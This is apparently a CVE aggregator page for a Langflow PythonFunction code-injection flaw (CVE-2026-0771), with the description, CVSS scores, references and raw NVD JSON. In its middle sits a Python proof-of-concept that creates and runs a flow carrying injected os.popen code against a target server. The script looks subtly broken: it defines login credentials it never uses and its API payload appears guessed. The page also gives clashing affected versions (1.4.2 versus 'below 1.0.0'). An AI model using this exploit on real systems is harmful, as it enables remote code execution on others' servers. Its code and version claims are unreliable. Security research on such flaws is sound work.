CVE-2026-0771

Description

Langflow PythonFunction Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Attack vectors and exploitability will vary depending on the configuration of the product. The specific flaw exists within the handling of Python function components. Depending upon product configuration, an attacker may be able to introduce custom Python code into a workflow. An attacker can leverage this vulnerability to execute code in the context of the application. Was ZDI-CAN-27497.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow:1.4.2:-:*:*:*:*:*:* - VULNERABLE

Langflow < 1.0.0（所有未修复版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json
import base64

# CVE-2026-0771 PoC - Langflow PythonFunction Code Injection
# This PoC demonstrates the code injection vulnerability in Langflow's PythonFunction component

TARGET_URL = "http://target:7860"

# Malicious Python code to be injected
# This example executes a simple command; modify as needed for your testing
malicious_code = """
import os
result = os.popen('whoami').read()
print(result)
"""

def exploit_cve_2026_0771():
    """
    Exploit for CVE-2026-0771: Langflow PythonFunction Code Injection
    Steps:
    1. Authenticate with Langflow (if authentication is enabled)
    2. Create a new flow or use existing flow
    3. Add a PythonFunction component
    4. Inject malicious code into the component
    5. Execute the flow to trigger RCE
    """
    
    # Step 1: Login and get session
    session = requests.Session()
    login_data = {
        "username": "attacker",
        "password": "password"
    }
    
    # Step 2: Create flow with PythonFunction component
    flow_data = {
        "name": "malicious_flow",
        "components": [
            {
                "type": "PythonFunction",
                "code": malicious_code,
                "inputs": {}
            }
        ]
    }
    
    # Step 3: Save and execute the flow
    response = session.post(
        f"{TARGET_URL}/api/v1/flows",
        json=flow_data
    )
    
    if response.status_code == 200:
        flow_id = response.json().get("id")
        # Step 4: Execute the flow to trigger RCE
        exec_response = session.post(
            f"{TARGET_URL}/api/v1/flows/{flow_id}/run"
        )
        print(f"Exploitation {'successful' if exec_response.status_code == 200 else 'failed'}")
        return exec_response.json()
    
    return None

if __name__ == "__main__":
    print("CVE-2026-0771 PoC - Langflow PythonFunction Code Injection")
    print("Use this only for authorized security testing")
    # result = exploit_cve_2026_0771()
    # print(result)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0771
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0771
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0771/
[4] VulDB https://vuldb.com/cve/CVE-2026-0771
[5] https://www.zerodayinitiative.com/advisories/ZDI-26-037/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0771", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:04.200", "lastModified": "2026-02-18T19:05:10.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Langflow PythonFunction Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Attack vectors and exploitability will vary depending on the configuration of the product.\n\nThe specific flaw exists within the handling of Python function components. Depending upon product configuration, an attacker may be able to introduce custom Python code into a workflow. An attacker can leverage this vulnerability to execute code in the context of the application. Was ZDI-CAN-27497."}, {"lang": "es", "value": "Vulnerabilidad de Inyección de Código PythonFunction de Langflow con Ejecución Remota de Código. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de Langflow. Los vectores de ataque y la explotabilidad variarán dependiendo de la configuración del producto.\n\nLa falla específica existe dentro del manejo de los componentes de función Python. Dependiendo de la configuración del producto, un atacante podría ser capaz de introducir código Python personalizado en un flujo de trabajo. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto de la aplicación. Fue ZDI-CAN-27497."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langflow:langflow:1.4.2:-:*:*:*:*:*:*", "matchCriteriaId": "81AAA7F9-843A-456C-89A1-B99D18AD4328"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-037/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}